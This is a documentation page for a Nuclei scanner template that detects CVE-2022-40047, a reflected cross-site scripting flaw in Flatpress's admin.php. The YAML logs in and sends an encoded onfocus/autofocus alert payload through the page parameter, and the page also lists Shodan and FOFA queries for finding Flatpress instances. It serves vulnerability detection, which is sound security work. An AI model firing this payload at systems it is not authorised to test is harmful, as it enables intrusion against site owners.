Skip to content
Nuclei Templates

Flatpress < v1.2.1 - Cross Site Scripting

ID: CVE-2022-40047

Severity: medium

Author: r3Y3r53

Tags: cve,cve2022,flatpress,authenticated,xss,intrusive

Description

Section titled “Description”

Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.

YAML Source

Section titled “YAML Source”
id: CVE-2022-40047


info:
  name: Flatpress < v1.2.1 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40047
    - https://github.com/flatpressblog/flatpress/issues/153
    - http://flatpress.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-40047
    cwe-id: CWE-79
    epss-score: 0.00535
    epss-percentile: 0.76696
    cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: flatpress
    product: flatpress
    shodan-query:
      - http.html:"flatpress"
      - http.favicon.hash:-1189292869
    fofa-query:
      - body="flatpress"
      - icon_hash=-1189292869
  tags: cve,cve2022,flatpress,authenticated,xss,intrusive
variables:
  randstring: "{{to_lower(rand_base(16))}}"


http:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}


        ------WebKitFormBoundary{{randstring}}
        Content-Disposition: form-data; name="user"


        {{username}}
        ------WebKitFormBoundary{{randstring}}
        Content-Disposition: form-data; name="pass"


        {{password}}
        ------WebKitFormBoundary{{randstring}}
        Content-Disposition: form-data; name="submit"


        Login
        ------WebKitFormBoundary{{randstring}}--
      - |
        GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "flatpress")'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "onfocus=\"alert(document.domain)")'
        condition: and
# digest: 4a0a00473045022100e8c642e2f801ceb0cd17b4d521ecb75ee5468cde38cfe894985cf1ae07e1883b02206ee47dfa6ded737012923d6923c6b2cffe1bba35f5dc0cf5432e262122e203ab:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40047.yaml"

View on Github